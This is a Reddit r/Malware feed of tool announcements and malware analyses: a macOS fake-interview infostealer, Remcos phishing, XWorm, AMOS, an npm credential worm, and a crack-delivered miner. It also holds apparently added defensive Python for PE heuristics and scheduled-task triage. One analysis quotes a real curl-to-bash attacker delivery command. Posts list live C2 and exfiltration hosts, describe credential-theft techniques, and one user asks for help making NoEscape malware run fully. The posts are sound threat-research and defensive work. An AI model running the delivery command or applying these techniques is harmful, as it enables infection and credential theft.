r/Malware

IOCX v0.7.0 — deterministic heuristics + adversarial PE samples

IOCX v0.7.0 is out. It’s a static IOC extraction and PE‑analysis engine built for DFIR and malware‑analysis workflows focused on deterministic behaviour. This release adds a deterministic heuristic engine, new adversarial PE samples, and a contract‑testing framework to keep output stable across runs.

Key changes in v0.7.0:

Deterministic heuristic engine (new)  

Snapshot‑tested heuristics for:

  • anti‑debug API usage
  • TLS callback anomalies
  • packer‑like section layouts + entropy
  • RWX sections
  • import‑table anomalies
  • signature anomalies

Runs under analysis_level = full and is designed to avoid false‑positive reconstruction.

Adversarial PE samples (new)  

Three intentionally hostile binaries covering:

  • rich/atypical imports
  • high‑entropy + malformed Rich Headers
  • split/reversed/null‑interspersed strings

Useful to validate deterministic heuristics and literal-only IOC extraction.

Rich Header crash fix  

Malformed Rich Headers with non‑UTF8 bytes could break JSON serialization. v0.7.0 adds a deep sanitiser that hex‑encodes nested byte structures for deterministic, JSON‑safe output.

Snapshot‑driven contract testing  

Each sample has a byte‑for‑byte JSON snapshot. Output must match exactly — same file, same output, every time.

Performance

Remains ~28 MB/s on typical PE samples.

Links

GitHub: https://github.com/iocx-dev/iocx  

PyPI: https://pypi.org/project/iocx/

Example

pip install iocx

iocx suspicious.exe -a full

Happy to hear feedback from anyone working with obfuscated or adversarial PE samples.

u/iocx_dev — 7 hours ago
▲ 12 r/Malware+1 crossposts
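As an added illustration (not code from the IOCX project), a stdlib-only Python sketch of two of the section-layout heuristics listed above, RWX sections and packer-like entropy, emitting canonical JSON so that a byte-for-byte snapshot comparison is meaningful. The two-section sample PE, the 7.0 bits/byte threshold and all function names are constructed for this example, not IOCX's.

```python
import json
import math
import struct
from collections import Counter

# Section characteristic flags from the PE/COFF specification.
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
RWX = SCN_EXECUTE | SCN_READ | SCN_WRITE

def shannon_entropy(data: bytes) -> float:
    """Bits per byte, rounded so float noise cannot break a byte-for-byte snapshot."""
    n = len(data)
    return round(-sum(c / n * math.log2(c / n) for c in Counter(data).values()), 4) if n else 0.0

def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section table (40-byte entries)."""
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]           # e_lfanew
    if pe[:2] != b"MZ" or pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", pe, pe_off + 6)[0]       # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", pe, pe_off + 20)[0]  # COFF SizeOfOptionalHeader
    sections = []
    for i in range(nsec):
        off = pe_off + 24 + opt_size + 40 * i
        name, vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "virtual_size": vsize,
                         "raw_size": rawsize, "characteristics": chars,
                         "entropy": shannon_entropy(pe[rawptr:rawptr + rawsize])})
    return sections

def heuristics(sections: list) -> list:
    """Two of the post's section checks; output is sorted so order never depends on dict/set iteration."""
    findings = []
    for s in sections:
        if s["characteristics"] & RWX == RWX:
            findings.append({"rule": "rwx_section", "section": s["name"]})
        if s["characteristics"] & SCN_EXECUTE and s["entropy"] > 7.0:   # 7.0 is a constructed threshold
            findings.append({"rule": "packed_code", "section": s["name"], "entropy": s["entropy"]})
    return sorted(findings, key=lambda f: (f["rule"], f["section"]))

def snapshot(pe: bytes) -> str:
    """Canonical JSON (sorted keys, fixed separators): same file, same bytes, every run."""
    sections = parse_sections(pe)
    return json.dumps({"findings": heuristics(sections), "sections": sections},
                      sort_keys=True, separators=(",", ":"))

def build_sample_pe() -> bytes:
    """Constructed two-section PE, not a real binary: benign .text plus an RWX max-entropy section."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0, 0x0022)   # AMD64, 2 sections, no optional header
    text = (b"\x55\x48\x89\xe5\x5d\xc3" + b"\x90" * 10) * 16        # prologue/ret plus NOP padding
    packed = bytes(range(256))                                       # every byte value once: 8.0 bits/byte
    def hdr(name, vaddr, ptr, raw, chars):  # 40-byte IMAGE_SECTION_HEADER
        return struct.pack("<8sIIIIIIHHI", name, len(raw), vaddr, len(raw), ptr, 0, 0, 0, 0, chars)
    table = hdr(b".text", 0x1000, 0x200, text, SCN_EXECUTE | SCN_READ) + hdr(b".pack0", 0x2000, 0x300, packed, RWX)
    return (bytes(dos) + b"PE\0\0" + coff + table).ljust(0x200, b"\0") + text + packed
```

Running `snapshot(build_sample_pe())` twice and comparing the strings is the whole contract test; a real harness would store the first result beside the sample and diff against it on every run.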

TamperedChef within GTA V/FiveM mods report - ModsHub / Network Graphics

This is ModsHub (formerly FiveMods), a GTA V/FiveM software package claiming to have over 1.2 million active users. It falls under the TamperedChef family.

It shares similarities with previous TC-classified software - e.g. it collects a lot of system user data, provides extensive logging, has various backup domains and obfuscated C2 communication, and a scheduled task set to autorun every day at 18:00 with a custom argument.

We have also discovered a more capable variant (which does not fall under the same business/network) called Network Graphics that includes, for example, a WebSocket connection, and that shares undeniable similarities with ModsHub - the code, technical functionality, behaviour and code signer Danylo Babenko are all almost identical.

Full report: https://rifteyy.org/report/tamperedchef-within-gta-v-modding-community

u/rifteyy_ — 3 days ago
▲ 1 r/Malware+1 crossposts

Another random post: why no accounts 😭

As a joke, I would like to give a presentation with a Windows 11 PC infected with NoEscape.exe.

But I noticed, with great disappointment, that on Windows 11 25H2 Home you don't get the rogue accounts, although everything else works?

What is wrong and how do I fix it?

u/Alternative-Camp-619 — 4 days ago
▲ 20 r/Malware+1 crossposts

malware-check - Open source tool for detecting malicious code in source files and binaries (MIT)

I open-sourced a CLI tool that scans source code and compiled binaries for malicious patterns.

Repository: https://github.com/momenbasel/malware-check
License: MIT
Language: Python

What it covers:

  • Source code analysis across 15+ languages (Python, JS, PHP, Go, Java, C, Ruby, etc.)
  • Binary analysis for PE (Windows), Mach-O (macOS), ELF (Linux)
  • YARA rule scanning with bundled rules
  • Docker sandbox for behavioral analysis of suspicious binaries
  • Privacy analyzer for tracking SDKs and PII handling
  • MobSF integration for APK/IPA mobile app analysis
  • Output formats: Console, JSON, HTML, SARIF 2.1.0

Detects: reverse shells, backdoors (all languages), web shells, obfuscated payloads (auto-decodes base64/hex/charcode), crypto miners, ransomware, credential theft, supply chain attacks, keyloggers, persistence mechanisms.

Feedback welcome - especially on detection pattern coverage gaps or false positive rates.

u/meowerguy — 8 days ago

Cheap Chinese fake iPhone.

I picked up a very cheap (30 USD) fake iPhone 17 as a joke. It's pretty slow and runs Android.

Can I log into my accounts like WhatsApp and Gmail?
Is it fine to connect to my home Wi-Fi?

thanks!

u/CharityDue2017 — 10 days ago
🔥 Hot ▲ 88 r/Malware

I was targeted by a fake job interview on Wellfound. Instead of becoming a victim I reverse-engineered the malware. Here's the full analysis: 571 encrypted config values decrypted, C2 and Sentry DSN exposed, DPRK/Contagious Interview attribution.

Last week I received what looked like a legitimate job opportunity on Wellfound. An operator persona named "Felix" at "HyperHive" ran a multi-email social engineering chain referencing my real CV and technical background, then directed me to "review the product" at hyperhives.net before a scheduled interview. Navigating to Settings → Diagnostics → Log triggered:

curl -s https://macos.hyperhives.net/install | nohup bash &

I did not enter my password into the fake dialog that appeared. I killed the processes, preserved the binary, and spent the next several hours reverse-engineering it in an air-gapped Docker lab.

The binary: 8.5MB Mach-O universal (x86_64 + arm64), Rust-compiled, production-grade infostealer. Currently 9/72 on VirusTotal — Sophos, CrowdStrike, Malwarebytes, and most enterprise tools are missing it.

The encryption problem: Every operationally significant string was encrypted using a custom cipher with 570 unique x86_64 helper functions. Each function computes a unique key offset via custom arithmetic (imul, rol, xor, shr, neg). I emulated all 570 functions using Unicorn CPU emulator and recovered all 571 encrypted configuration values in 1.1 seconds.

What that exposed:

  • C2: cloudproxy.link (4 endpoints: /m/opened, /m/metrics, /m/decode, /db/debug)
  • Sentry DSN: 526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008 — a legal subpoena to Sentry for org 4509139651198976 would yield the operator's registration email, payment records, and IP history
  • Build identity: user rootr, codename force, version 9.12.1
  • 276 Chrome extension IDs targeted: 188 crypto wallets, 3 password managers, Deloitte credential store

What it steals: browser passwords, credit cards, cookies, login keychain, Apple Notes, Telegram session data, crypto wallet extensions.

TTP alignment: Wellfound fake recruiter, multi-step trust building, curl|bash delivery, Rust macOS binary, fake password dialog, massive crypto wallet targeting — consistent with DPRK Contagious Interview / CL-STA-240.

Disclosure timeline: Email received April 4. Analysis completed April 6. Reported to FBI IC3 April 6. Publishing April 7.

Full repo with YARA rules, Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer, decryption scripts, and all IOCs: https://github.com/Darksp33d/hyperhives-macos-infostealer-analysis

VirusTotal (9/72 detections): https://www.virustotal.com/gui/file/5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3/detection

u/SD483 — 15 days ago
▲ 0 r/Malware+1 crossposts

Nuitka to Python. Nuitka is not really Cython code due to dependencies; I recommend creating a new Python compiler to protect your source rather than relying on a weak compiler like Nuitka. You also need to decrypt the XORed Nuitka blob in 4.0 (a very easy task).

github.com
u/HydraDragonAntivirus — 11 days ago

Phishing via Google Storage Abuse Leading to RAT Deployment

Any[.]run identified a multi-stage phishing campaign using a Google Drive-themed lure and delivering Remcos RAT. Attackers place the HTML on storage[.]googleapis[.]com, abusing trusted infrastructure instead of hosting the phishing page on a newly registered domain.

The chain leverages RegSvcs.exe, a legitimate signed Microsoft/.NET binary with a clean VirusTotal hash. Combined with trusted hosting, this makes reputation-based detection unreliable and lowers alert priority during triage. File reputation alone is not enough. Detection depends on behavioral analysis and sandboxing.

The page mimics a Google Drive login form, collecting email, password, and OTP. After a “successful login,” the victim is prompted to download Bid-Packet-INV-Document.js, triggering a multi-stage delivery chain:

  1. JS (WSH launcher + time-based evasion)
  2. VBS Stage 1 (download + hidden execution)
  3. VBS Stage 2 (%APPDATA%\WindowsUpdate + Startup persistence)
  4. DYHVQ.ps1 (loader orchestration)
  5. ZIFDG.tmp (obfuscated PE / Remcos payload)
  6. Textbin-hosted obfuscated .NET loader (in-memory via Assembly.Load)
  7. %TEMP%\RegSvcs.exe hollowing/injection
  8. Partially fileless Remcos + C2

Analysis session: https://app.any.run/tasks/0efd1390-c17a-49ce-baef-44b5bd9c4a97

TI Lookup query: domainName:www.freepnglogos.com and domainName:storage.googleapis.com and threatLevel:malicious

IOCs
Phishing URLs:
hxxps://storage[.]googleapis[.]com/pa-bids/GoogleDrive.html
hxxps://storage[.]googleapis[.]com/com-bid/GoogleDrive.html
hxxps://storage[.]googleapis[.]com/contract-bid-0/GoogleDrive.html
hxxps://storage[.]googleapis[.]com/in-bids/GoogleDrive.html
hxxp://storage[.]googleapis[.]com/out-bid/GoogleDrive.html

Credential exfiltration domains:
usmetalpowders[.]co
iseeyousmile9[.]com

Credential exfiltration path:
/1a/uh.php

Malware staging host:
brianburkeauction[.]com

Source: r/ANYRUN

u/malwaredetector — 13 days ago

Behavioral Analysis: XWorm v6.5 RAT Dropper via Batch File

Hello,

I downloaded a sample from MalwareBazaar. It was a .bat file of around 208.38 KB. I set it up in AnyRun and started the analysis.

---

Threat Type: XWorm v6.5 (RAT) + Stealer sold as Malware-as-a-Service. Capabilities include credential theft, keylogging, screenshot capture, file exfiltration, and hijacking of crypto wallets and accounts.

Execution Process:

  1. .bat file runs -> checks for sandbox using findstr.exe
  2. Uses certutil.exe to Base64-decode an embedded payload
  3. cscript.exe executes decoded VBScript, dropping svchost.exe (fake) to %TEMP%
  4. Payload launches, copies itself to %APPDATA%\main.exe and the startup folder for persistence
  5. Connects to C2 and sends system fingerprint via Telegram Bot API

IOCs

Dropper SHA256: dea6cfb3234780ceeea718787e027cc6d2de18cfead1f8cc234e0ad268987868

Dropped Payload SHA256: 7f2b0ffbc5b149b4f9858589763bacdebf63ea1b3a00532e9278d613f75462ea

  • C2: 23.160(.)168.174:3212
  • AES Key: <666666>
  • Mutex: XUH24Sz2TPub4OF4
  • USB drop name: XWorm V6.5 by c3lestial(.)fun

Full Analysis: https://app.any.run/tasks/1cd22443-8259-49c0-8e6e-a0ca93b0371c

u/Next-Profession-7495 — 7 days ago

Hello message on iPhone out of the blue

I woke up one morning and found a weird screen message “hello” that was preventing me from seeing the time.

It was asking me to click on something that led to another message asking again to click on some configurations - it resembled the setup of a brand new iPhone, so I thought an update got installed automatically overnight. So I clicked on everything because the screen was not like the normal one and I just needed to see what time it was.

But it turns out there was no update at all.

All this happened 3 days after my mother gave me (on the phone) the password for the WiFi connection. Was someone recording my conversations and then got access to my WiFi and infected my device??

Since then my smartphone has had a heating issue, and Safari pages crash all the time…

Any ideas what’s causing this?

u/Otherwise_Seat_2950 — 9 days ago

Atomic Stealer (AMOS) macOS Malware Decryption, Anti-VM, Hardware Wallet Trojanization & Persistent Backdoor

Picked up a low-VT AMOS sample on March 12 worth flagging. Aligns with the recent malext variants but layers a few things we haven't seen combined before:

  • Custom multi-stage decryption (hex → ASCII → base64 via custom hash table) serving obfuscated osascript payloads at runtime — static analysis gets you almost nothing
  • Anti-VM via system_profiler checking for QEMU/VMware/KVM processor strings and known sandbox hardware serials, run twice before payload delivery
  • Payload written to /bin/zsh child process iteratively via write() loop — no plaintext payload on disk
  • 300+ crypto extension IDs targeted + full desktop wallet scraping
  • Hardware wallet trojanization — silently replaces Ledger, Trezor, and Exodus with adhoc-signed phishing lookalikes that harvest passwords and seed phrases to systellis[.]com
  • Three-layer persistence: root LaunchDaemon (com.finder.helper) → ~/.mainhelper backdoor pulled from C2 → ~/.agent polling loop that pivots backdoor execution into the active console user's context every second via stat -f "%Su" /dev/console
u/Few-Calligrapher2797 — 13 days ago

@fairwords npm packages compromised by a self-propagating credential worm - steals tokens, infects other packages you own, then crosses to PyPI

Three @fairwords scoped npm packages were hit today by what appears to be the TeamPCP/CanisterWorm campaign. The interesting part isn't just the credential theft, it's what it does with your npm token afterward.

What the postinstall payload does:

  • Harvests environment variables matching 40+ patterns (AWS, GCP, Azure, GitHub, OpenAI, Stripe, etc.)
  • Reads SSH keys, .npmrc, .kube/config, Docker auth, Terraform credentials, .git-credentials
  • Steals crypto wallet data - Solana keypairs, Ethereum keystores, MetaMask LevelDB, Phantom, Exodus, Atomic Wallet
  • Decrypts Chrome saved passwords on Linux using the well-known hardcoded PBKDF2 key ("peanuts" / "saltysalt")
  • Scans /proc/[pid]/environ for tokens in other running processes

Affected versions:

  • @fairwords/websocket 1.0.38 and 1.0.39
  • @fairwords/loopback-connector-es 1.4.3 and 1.4.4
  • @fairwords/encryption 0.0.5 and 0.0.6

If you have any of these installed, rotate npm tokens, cloud keys, SSH keys immediately and check whether any packages you maintain received unexpected version bumps.

Full analysis with IOCs and payload walkthrough in the blog.

safedep.io
u/BattleRemote3157 — 14 days ago

Another cryptominer - undetected by Windows Defender / ESET NOD32 and Malwarebytes

Obvious signs: High cpu activity without any "visible" reason.

The malware creates a fake dwm.exe process. That process exists in addition to the original dwm.exe of Windows. It connects to a Dutch VPS.

It hides itself from the most common end-user process-listing methods (Task Manager, Sysinternals Process Explorer, perfmon etc.).

It is not detected by Windows Defender, by Malwarebytes and ESET NOD32.

It can be spotted when renaming SysInternals Process Explorer executable or using a tool like System Informer. Process Explorer is unable to kill this process, while System Informer is.

Based on what I see, that dwm.exe doesn't exist as a file, only in memory.

Screenshots: the fake process; the protected process; the unauthorized connection.

u/Office-These — 15 days ago

My personal PlugX analysis

Hello,
I wanted to share the findings I made on this malware (SHA256 included on the first page of the link, linking to MalwareBazaar).
I started 4 months ago and this is my first "APT" analysis. The reason I'm saying this is that if you have any feedback, suggestions, or corrections regarding either the analysis or the drafting of the text, I’d be more than happy to hear them, since I’m always learning. The entire analysis was done “blind”, meaning I didn’t read any prior analyses by others. This was essentially a personal challenge for me, and also a way to study more effectively: it’s better to really bash my head against it than to just read how it works (over a month and a half...).

A quick run-down:
Tools used:
DIE, Sysinternals, IDA, x32dbg.

As many of you probably know (since it's widely published), the malware is a side-loader. In this case it was using the media player "mpc-hc"; it crashed by then calling "initcrashrpt.dll" and starting the injection, followed by threads.

Sadly, due to technical inability, I couldn't understand whether data was being exfiltrated during the initial contact with the C2 (beaconing).

The only data I retrieved is the ID it was sending. However, aside from seeing what was or wasn't stolen, I think it's really nice to see and understand the techniques used (e.g. PEB walking).

The focus of the guide was to make it a guided walkthrough where I explain some concepts that I also had to stop and open the docs to learn (not trying to sound condescending, since I'm still a beginner; simply my English is bad).

https://github.com/Nimbax1/My-Malware-Analysis/blob/main/PlugX/Analysis.md

[Edit - typos]

u/Nimbax — 14 days ago

Fender Studio Pro 8 crack from RuTracker installed a miner + RAT on my PC!

Downloaded Fender Studio Pro 8 crack from RuTracker (TEAM R2R release). Ran it. Nothing happened. Thought I was fine.

Next day, I noticed an unknown app in my startup menu that I had never seen before. That is when I started digging.

Here is exactly what I found and how you can check your own PC.

What the crack did

The crack executed several R2R tools on Day 1:

File                              Time
R2R System v1.3.1.exe             5:07 PM
Setup Sphere Manager v3.0.0.exe   5:14 PM
SphereManager.exe                 5:52 PM
WitchConfig.exe                   5:55 PM

Nothing seemed wrong at the time. But these tools were silently installing malware.

What the malware installed

Component          Details
File               RuntimeHost.exe (original name SimpleRunPE.exe) hidden in C:\ProgramData\Microsoft\Windows\Caches\D3F4E2A1
Attributes         Hidden + System (+h +s) - invisible in File Explorer by default
Persistence        3 scheduled tasks named "Windows System Health", "Windows System Health Check", "Windows System Health Monitor"
Registry           abWinSysCache key in HKCU\Software\Microsoft\Windows\CurrentVersion\Run to run on every boot
Process hollowing  Malware injected itself into legitimate InstallUtil.exe (PID 9048) to hide
Payload            GMiner cryptominer configured to mine BeamHash to attacker's wallet via beam.2miners.com:5252

Attacker wallet: 39f1c115f278f33c79f2097fd300c92f627d9e5999f8d580c3736c499b29b8c3da7

The 24-hour delay trick

The crack installed everything on Day 1 but set the scheduled tasks to trigger on Day 2. This is deliberate. If the malware ran immediately, you would suspect the crack. By waiting a day, most people never make the connection.

How I traced it (brief technical steps)

  1. UserAssistView - Showed every executable the crack ran with exact timestamps
  2. File Explorer - Enabled "Show hidden files" and unchecked "Hide protected operating system files" to reveal the hidden malware folder
  3. VirusTotal - Uploaded RuntimeHost.exe, got 47/72 detections
  4. Hollows Hunter - Detected process hollowing with "replaced": 1 flag on PID 9048
  5. Task Scheduler - Found 3 malicious tasks with Author = my username (not Microsoft)
  6. Registry Editor - Found abWinSysCache Run key pointing to the malware
  7. schtasks command - Exported all tasks to CSV for analysis

How to check your own PC

  • Run UserAssistView to see recent executables
  • Check C:\ProgramData\Microsoft\Windows\Caches\ for random folders with hidden .exe files
  • Open Task Scheduler and look for tasks named "Windows System Health" with YOUR username as author
  • Open Regedit and check HKCU\Software\Microsoft\Windows\CurrentVersion\Run for abWinSysCache
  • Run Hollows Hunter as admin and look for "replaced": 1 in the output

Confirmation from security vendors

VirusTotal SHA-256: 02743f00223117c2c04fbfb8267ac7272be632a552b8182e943032d1c78a8bf5

Vendor        Detection
Microsoft     Trojan:Win32/Kepavll!rfn
Kaspersky     HEUR:Trojan.Win32.Generic
Malwarebytes  Trojan.CoinMiner
ESET          MSIL/CoinMiner.BYG
BitDefender   Gen:Variant.Zusy.605690

47 out of 72 security vendors flagged it as malicious. File is unsigned with fake Microsoft copyright.

What I did to clean it

taskkill /pid 9048 /f
schtasks /delete /tn "\Windows System Health" /f
schtasks /delete /tn "\Windows System Health Check" /f
schtasks /delete /tn "\Windows System Health Monitor" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v abWinSysCache /f
rmdir /s /q "C:\ProgramData\Microsoft\Windows\Caches\D3F4E2A1"

Why I am posting this

I want to warn others about downloading cracks from RuTracker. This specific Fender Studio Pro 8 release (TEAM R2R) is malicious.

I am open to providing all evidence for anyone who wants to read it - full forensic trace with timestamps, screenshots, and analysis.

Stay safe

u/ThisWasNeverTheEnd — 1 day ago
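As an added example (not from the post above), a Python triage of the CSV that `schtasks /query /fo CSV /v` exports (step 7 of the trace), applying the post's own indicators: a system-sounding task name registered outside \Microsoft\, a local user rather than Microsoft as Author, and a binary under ProgramData, AppData or Temp. The column subset and the sample rows are constructed; the malicious path is the one the post reports.

```python
import csv
import io
import ntpath

# Constructed excerpt in the layout of `schtasks /query /fo CSV /v` (a column subset; the real export has
# many more columns, and the header row that schtasks can repeat per task folder is mimicked here).
SAMPLE_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User"
"DESKTOP-AB12","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"HostName","TaskName","Status","Author","Task To Run","Run As User"
"DESKTOP-AB12","\Windows System Health","Ready","DESKTOP-AB12\victim","C:\ProgramData\Microsoft\Windows\Caches\D3F4E2A1\RuntimeHost.exe","victim"
"DESKTOP-AB12","\Windows System Health Check","Ready","DESKTOP-AB12\victim","C:\ProgramData\Microsoft\Windows\Caches\D3F4E2A1\RuntimeHost.exe","victim"
"DESKTOP-AB12","\MyBackup","Ready","DESKTOP-AB12\victim","C:\Tools\backup.exe nightly","victim"
'''

# Authors seen on genuine Microsoft tasks: vendor name, built-in accounts, or MUI resource references "$(@...)".
SYSTEM_AUTHOR_MARKERS = ("microsoft", "system", "nt authority", "$(@")
USER_WRITABLE_DIRS = ("\\programdata\\", "\\appdata\\", "\\temp\\", "\\users\\public\\")

def system_looking_name(task_name: str) -> bool:
    """Named like an OS component but registered outside \\Microsoft\\, where the real ones live."""
    folder, base = ntpath.split(task_name)
    return base.lower().startswith(("windows ", "microsoft ")) and not folder.lower().startswith("\\microsoft")

def non_microsoft_author(author: str) -> bool:
    return not any(marker in author.lower() for marker in SYSTEM_AUTHOR_MARKERS)

def runs_from_writable_dir(command: str) -> bool:
    return any(d in command.lower() for d in USER_WRITABLE_DIRS)

def triage_tasks(csv_text: str) -> list:
    """Flag tasks that spoof a system name and show at least one more of the post's indicators."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"] == "TaskName":          # repeated header row, skip
            continue
        if not system_looking_name(row["TaskName"]):
            continue                               # ordinary user tasks are not reported
        reasons = ["system-looking name outside \\Microsoft\\"]
        if non_microsoft_author(row["Author"]):
            reasons.append("author is a local user: " + row["Author"])
        if runs_from_writable_dir(row["Task To Run"]):
            reasons.append("runs from a user-writable directory")
        if len(reasons) > 1:
            findings.append({"task": row["TaskName"], "command": row["Task To Run"], "reasons": reasons})
    return findings
```

On a live machine, feed it the export from `schtasks /query /fo CSV /v > tasks.csv`; a hostname containing the word "system" would defeat the author check, which is why the name and path indicators are required as well.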